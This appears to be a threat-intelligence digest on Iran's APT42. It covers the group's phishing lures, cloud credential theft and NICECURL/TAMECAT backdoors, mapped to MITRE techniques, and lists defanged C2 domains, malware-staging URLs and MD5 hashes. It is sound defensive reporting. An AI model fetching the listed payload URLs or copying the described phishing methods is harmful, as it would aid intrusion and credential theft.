Threat Research

Uncharmed: Untangling Iran’s APT42 Operations

Securonix

APT42, an Iranian state-sponsored actor linked to the IRGC-IO, uses enhanced social engineering and cloud-targeting operations to harvest credentials and access Microsoft 365 environments, while deploying custom backdoors NICECURL and TAMECAT to exfiltrate data and maintain a foothold. The activity overlaps with other Iran-nexus groups and includes multiple credential-harvesting clusters, MFA bypass attempts, and defense-evasion techniques to remain under detection. #APT42 #IRGC_IO #NICECURL #TAMECAT #Microsoft365

Keypoints

  • APT42 is an Iranian state-sponsored actor (associated with IRGC-IO) targeting NGOs, media, academia, legal services, and activists.
  • The group uses social engineering, posing as journalists and event organizers, to harvest credentials and gain initial access to cloud environments.

MITRE Techniques

  • [T1566.002] Phishing – Spearphishing Link – Used to harvest credentials via phishing URLs masquerading as legitimate articles; “Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.”
  • [T1078] Valid Accounts – Harvested credentials used to gain initial access to cloud environments; “harvest credentials and use them to gain initial access to cloud environments.”
  • [T1071.001] Web Protocols – C2 over HTTP – Backdoors communicate with their C2 node via HTTP.
  • [T1567.002] Exfiltration to Cloud Storage – Exfiltrated documents to a OneDrive account masquerading as the victim’s organization.
  • [T1047] WMI – Used to query anti-virus products during TAMECAT execution; “Windows Management Instrumentation (WMI) to query anti-virus products running on the victim’s system.”
  • [T1059.005] VBScript – NICECURL is a VBScript-based backdoor; “NICECURL backdoor written in VBScript that can download additional modules…”
  • [T1059.001] PowerShell – TAMECAT is a PowerShell toehold; “a PowerShell toehold that can execute arbitrary PowerShell or C# content.”
  • [T1059.003] Windows Command Shell – The script uses Cmd.exe to execute a Curl command in TAMECAT execution.
  • [T1105] Ingress Tool Transfer – Downloads additional modules and content for execution (NICECURL/TAMECAT chains).
  • [T1027.001] Obfuscated/Encrypted Files – The TAMECAT backdoor payload is obfuscated and AES-encrypted.
  • [T1036] Masquerading – Posing as NGOs, “Mailer Daemon,” and Bitly URL shortening services to disguise activity.
  • [T1070] Indicator Removal on Host – Clearing Chrome browser history as a defense-evasion move.

Indicators of Compromise

  • [Domain] Domain used for C2 and phishing: glitch.me (e.g., accurate-sprout-porpoise.glitch.me) – context: C2 domain used by TAMECAT
  • [Domain] Typosquatted/news domain: washinqtonpost[.]press – context: typosquatted masquerade domain in Cluster A
  • [Domain] Typosquatted/news domain: washinqtonpost.press – context: typosquatted domain mentioned as lure
  • [Domain] Bitly/shortener domain used in lures: bitly[.]org[.]il – context: masquerading as Bitly in Cluster C
  • [Domain] Other C2/domain: worried-eastern-salto[.]glitch[.]me – context: C2-related domain
  • [URL] hxxp://s3[.]tebi[.]io/icestorage/nconf.txt – context: download URL for TAMECAT delivery chain
  • [URL] hxxps://s3[.]tebi[.]io/icestorage/df32s.txt – context: AES decryption script URL for TAMECAT
  • [MD5] 347b273df245f5e1fcbef32f5b836f1d – context: NICECURL sample MD5
  • [MD5] 2f6bf8586ed0a87ef3d156124de32757 – context: NICECURL sample decoy file
  • [MD5] 13aa118181ac6a202f0a64c0c7a61ce7 – context: encrypted RAR decoy file associated with NICECURL
  • [MD5] 081419a484bbf99f278ce636d445b9d8 – context: MD5 for the nconf.txt PowerShell script

Read more: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations